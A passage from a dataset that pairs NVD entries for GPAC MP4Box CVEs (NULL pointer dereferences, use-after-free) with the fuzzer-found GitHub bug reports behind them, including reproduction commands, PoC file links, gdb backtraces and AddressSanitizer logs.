isomedia/isom_intern.c:615 #27 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #28 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f49dd75a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xb1e93d in stco_New isomedia/box_code_base.c:5616 #2 0x6d28d8 in gf_isom_box_new_ex isomedia/box_funcs.c:1385 #3 0x6d31ae in gf_isom_box_parse_ex isomedia/box_funcs.c:182 #4 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #5 0xb1d707 in stbl_Read isomedia/box_code_base.c:5381 #6 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #7 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #8 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #9 0xb1701a in minf_Read isomedia/box_code_base.c:3500 #10 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #11 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #12 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #13 0xb15187 in mdia_Read isomedia/box_code_base.c:3021 #14 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #15 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #16 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #17 0xb249cd in trak_Read isomedia/box_code_base.c:7134 #18 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #19 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #20 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #21 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #22 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #23 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #24 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #25 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #26 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #27 0x6ee2a2 in gf_isom_open_file isomedia/isom_intern.c:615 #28 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #29 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ```
AddressSanitizer: NULL pointer dereference (use-after-free ) in gf_isom_box_del isomedia/box_funcs.c:1500
https://api.github.com/repos/gpac/gpac/issues/1332/comments
2
2019-11-09T11:19:52Z
2022-01-26T08:36:22Z
https://github.com/gpac/gpac/issues/1332
520,394,510
1,332
CVE-2019-20165
2019-12-31T00:15:12.743
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function ilst_item_Read() in isomedia/box_code_apple.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1338" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1338
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hello, I found a similar issue but I am not sure they are the same. https://github.com/gpac/gpac/issues/1263 System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-ilst_item_Read ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-ilst_item_Read gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000006c499d in ilst_item_Read () (gdb) bt #0 0x00000000006c499d in ilst_item_Read () #1 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #2 0x0000000000513e15 in gf_isom_parse_root_box () #3 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #4 0x000000000051c48c in gf_isom_open_file () #5 0x000000000041c082 in mp4boxMain () #6 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #7 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27902==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000ac4185 bp 0x7fffffff8230 sp 0x7fffffff8220 T0) #0 0xac4184 in ilst_item_Read isomedia/box_code_apple.c:119 #1 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #6 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #7 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #8 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_code_apple.c:119 ilst_item_Read ==27902==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
ERROR: AddressSanitizer: NULL pointer dereference in ilst_item_Read isomedia/box_code_apple.c:119
https://api.github.com/repos/gpac/gpac/issues/1338/comments
4
2019-11-09T12:06:24Z
2020-01-08T12:45:38Z
https://github.com/gpac/gpac/issues/1338
520,405,629
1,338
CVE-2019-20166
2019-12-31T00:15:12.837
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_isom_dump() in isomedia/box_dump.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1331
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_dump ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_dump gdb info: ```C Error in bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc600 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513eae in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "tenc" (start 8) has 389 extra bytes [iso file] Unknown top-level box type ffff [iso file] Incomplete box ffff - start 532 size 1717986903 [iso file] Incomplete file while reading for dump - aborting parsing  ASAN:SIGSEGV ================================================================= ==26000==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006a3968 bp 0x61600000ea80 sp 0x7fffffff8080 T0) #0 0x6a3967 in gf_isom_dump isomedia/box_dump.c:133 #1 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #2 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #3 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_dump.c:133 gf_isom_dump ==26000==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: NULL pointer dereference in gf_isom_dump isomedia/box_dump.c:133
https://api.github.com/repos/gpac/gpac/issues/1331/comments
2
2019-11-09T11:18:44Z
2020-01-08T12:44:45Z
https://github.com/gpac/gpac/issues/1331
520,394,250
1,331
CVE-2019-20167
2019-12-31T00:15:12.930
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function senc_Parse() in isomedia/box_code_drm.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1330
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-senc_Parse ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-senc_Parse gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000006e1112 in senc_Parse () (gdb) bt #0 0x00000000006e1112 in senc_Parse () #1 0x000000000051b7b2 in gf_isom_parse_movie_boxes.part () #2 0x000000000051c48c in gf_isom_open_file () #3 0x000000000041c082 in mp4boxMain () #4 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #5 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Unknown box type tfhd in parent moof [iso file] Unknown box type mvhd in parent moof [iso file] Box "tfhd" (start 561) has 68 extra bytes [iso file] Box "tfhd" (start 653) has 594 extra bytes [iso file] extra box tfhd found in traf, deleting [iso file] Box "tfhd" (start 1275) has 68 extra bytes [iso file] Unknown box type VOID in parent moof [iso file] Box "tfhd" (start 1993) has 68 extra bytes [iso file] Box "sgpd" (start 2085) has 373 extra bytes [iso file] Box "traf" is larger than container box [iso file] Box "moof" size 2056 (start 24) invalid (read 2675) [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [isobmf] no moov found, cannot get cenc default info, assuming isEncrypted, IV size 16  ASAN:SIGSEGV ================================================================= ==27812==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000058 (pc 0x000000b0801d bp 0x000000000003 sp 0x7fffffff82c0 T0) #0 0xb0801c in senc_Parse isomedia/box_code_drm.c:1378 #1 0x6dc006 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:407 #2 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #3 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #4 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_code_drm.c:1378 senc_Parse ==27812==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: NULL pointer dereference in senc_Parse isomedia/box_code_drm.c:1378
https://api.github.com/repos/gpac/gpac/issues/1330/comments
2
2019-11-09T11:17:12Z
2020-01-08T12:44:20Z
https://github.com/gpac/gpac/issues/1330
520,393,923
1,330
CVE-2019-20168
2019-12-31T00:15:13.007
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a use-after-free in the function gf_isom_box_dump_ex() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1333
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_dump_ex ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_dump_ex gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x0000000000505aee in stco_dump () (gdb) bt #0 0x0000000000505aee in stco_dump () #1 0x0000000000514918 in gf_isom_box_dump_ex () #2 0x0000000000502e15 in gf_isom_box_array_dump () #3 0x00000000005149dc in gf_isom_box_dump_done () #4 0x0000000000503a1b in stbl_dump () #5 0x0000000000514918 in gf_isom_box_dump_ex () #6 0x0000000000502e15 in gf_isom_box_array_dump () #7 0x00000000005149dc in gf_isom_box_dump_done () #8 0x000000000050615d in minf_dump () #9 0x0000000000514918 in gf_isom_box_dump_ex () #10 0x0000000000502f10 in gf_isom_dump () #11 0x0000000000425faa in dump_isom_xml () #12 0x000000000041c69a in mp4boxMain () #13 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #14 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Box "mvhd" (start 445) has 8 extra bytes [iso file] Unknown box type tkhd in parent moov [iso file] Unknown box type mdia in parent moov [iso file] Box "UNKN" is larger than container box [iso file] Box "moov" size 256 (start 437) invalid (read 830) [iso file] Read Box type 00000000 (0x00000000) at position 851 has size 0 but is not at root/file level, skipping [iso file] Box "stsd" (start 817) has 120 extra bytes [iso file] Box "stco" (start 1003) has 40 extra bytes ================================================================= ==27857==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000ee50 at pc 0x0000006c6f5d bp 0x7fffffff7db0 sp 0x7fffffff7da0 READ of size 8 at 0x60600000ee50 thread T0 #0 0x6c6f5c in gf_isom_box_dump_ex isomedia/box_funcs.c:1734 #1 0x6a370c in gf_isom_box_dump isomedia/box_dump.c:97 #2 0x6a370c in gf_isom_box_array_dump isomedia/box_dump.c:107 #3 0x6c6faf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #4 0x6a4f3e in stbl_dump isomedia/box_dump.c:379 #5 0x6c6e7d in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #6 0x6a370c in gf_isom_box_dump isomedia/box_dump.c:97 #7 0x6a370c in gf_isom_box_array_dump isomedia/box_dump.c:107 #8 0x6c6faf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #9 0x6aa69a in minf_dump isomedia/box_dump.c:1291 #10 0x6c6e7d in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #11 0x6a3937 in gf_isom_box_dump isomedia/box_dump.c:97 #12 0x6a3937 in gf_isom_dump isomedia/box_dump.c:139 #13 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #14 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #15 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #16 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60600000ee50 is located 16 bytes inside of 56-byte region [0x60600000ee40,0x60600000ee78) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free 